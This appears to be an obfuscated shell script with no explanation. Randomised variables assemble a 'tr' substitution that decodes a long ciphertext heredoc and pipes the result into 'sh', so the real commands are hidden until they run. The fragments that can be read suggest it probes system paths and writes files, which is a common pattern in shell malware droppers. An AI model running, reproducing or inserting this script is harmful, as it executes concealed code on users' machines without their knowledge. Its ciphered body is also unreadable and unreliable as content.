#!/bin/sh BKuKHRaO=tr${zHBB} keuWCA="\\" NAZXfYqu=${tEAlg}${keuWCA}133${wufQ} SfckSmTh=${QPHrZ}${keuWCA}055${gJoe} okCffg=${vaObk}${keuWCA}134${hJAi} $BKuKHRaO 'xR*UHS;of!dET\nyJ<'"'"'}ekM>Q'$NAZXfYqu'bGN]VI'$okCffg'&O"%#)mpalFhuj'$SfckSmTh'PsLqCXgY( nBvwi+{`czAKr|D$ZW=t' 'makS)Tx!$`P=io\n|{'$NAZXfYqu'Lh<wQ'$okCffg'"'$SfckSmTh'rp}OtNGZV> DMA]Yfg+Inus%lKyej&qdWX#Fz;CvJE('"'"'*RHBUcb'<<"ndnzbTSGygDmyxn"|${lqkavvp}s${qSrZwZAFSCroSy}h${JwQWAlEmNsvGbS} wo/tT-/seyg;N GI#dpS$E[f<dpS$]:/tT-:/stT-:/PsG/tT-:/PsG/stT-:/PsG/tT-/v11:/PsG/q =Rq/stT-:/PsG/q =Rq/tT-[y= xxR-n#bc#nTG-Rxg#%/ngc/-Pqq#2%(1#JJ#nTG-Rxg#KH#<#IgsI#b+#[f1[#((#g=e #[.[#((#GgIPG-{#q =Rq#GE[f<1L[f<1ww|'o/a][][{#=Rsg#fG#T-#/|'o/a|/|J'o/a|/|H#GE[f<GL/|][{#g=e #[f<GL[f<Gww|'o/a][][{{#|/|H#g=e #f<GLL'o/a]{{#[[H#g=e #f1{{#|H#g=e #.{{#gsR={#]yIgsI#bn#/gI=/= -FTh#((#= -FnTGE/gI=/= -FTh#JJ#<#IgsI#bn#/x-I/$)p_DVVS/.= -FTh#((#= -FnTGE/x-I/$)p_DVVS/.= -FTh{#]y= xxR-n#bc#hgI=Fh#%#/ngc/-Pqq#2%(1#JJ#hgI=Fh#KH#<#sgn#b-#r${f<;{s/QK.|QyQ'r[f<1//Q//QQQ/][raQJ^Q'r[f<1//Q//QQQ/][raQHQy//j{s/QK^QJQyQHQ''^QyaQuQaQy.|//N]r#[f<4:bf<= -FnTG]/P}T-P;.= -F][#J#sgn#b-#rs/^r[f<2//Q//QQQ/][r#Q?E#Q?QK.|QH/Q1/jNr{#]ytnTGEyIgsI#bF#[f<= -FnTG]/sxt.= -F[#((#F G#T#T-#e xgs#dPtqT=#) M-q Rn#mPqITxgnTR#Bgt#Dg= GnT-hs{#n #tnTGE!hgI=Fh#[fT[#NRIe#bF#[f<= -FnTG]/sxt.= -F[!#((#IgsI#o#b+#[ftnTG[#((#tnTGE!nTG-Rxg#[ftnTG[!#((#IgsI#bn#[ftnTG[#((#IgsIMGTIgRtqgEfKx*IgxN#[f<tnTG]/.IxN.vvvvvv[H#((#Gx#[f<IgsIMGTIgRtqg][#((#tGgR*{#tnTGErr{#n -gyIgsI#b+#[f<tnTG][#JJ#IgsI#o#bn#[f<tnTG][#((#<#= xxR-n#bc#GgRnqT-*#%/ngc/-Pqq#2%(1#JJ#q-#bsF#/tT-/tPsXt ;#/PsG/tT-/GgRnqT-*{#F G#T#T-#e xgs#dPtqT=#) M-q Rn#mPqITxgnTR#Bgt#Dg= GnT-hs{#n #tnTGE!GgRnqT-*#[/seRGg/f<T][#2%/ngc/-Pqq!#((#IgsI#o#b+#[ftnTG[#((#tnTGE!nTG-Rxg#[ftnTG[!#((#tnTGE/seRGg/f<tnTGww|/]#((#IgsI#bn#[ftnTG[#((#tGgR*{#n -g{yIgsI#b+#[f<tnTG][#JJ#IgsI#o#bn#[f<tnTG][{#]#((#<#tnTGE!hgI=Fh#U$pDA_)Ai#ngF" qmd#bF#[f<= -FnTG]/ngF_seRGg.T-F [!yIgsI#b+#[f<tnTG][#JJ#IgsI#o#bn#[f<tnTG][{#]#((#<#tnTGE!x P-I#J#sgn#b-#[s/.|QKQ/seRGgQ/'^#/aQuQH#.|/Q1/hN[#J#egRn#b-#1!yIgsI#b+#[f<tnTG][#JJ#IgsI#o#bn#[f<tnTG][{#]#((#<#F G#T#T-#`p`$A)A"3_)pSp#`p`$A)A"2_)pSp#`p`$A)A"1_)pSp#m)0_)pSp{#n #IgsI#bn#[/seRGg/f<T][#((#tnTGE[/seRGg/f<T][#((#tGgR*{#n "K01XgiiehpQmv.sh"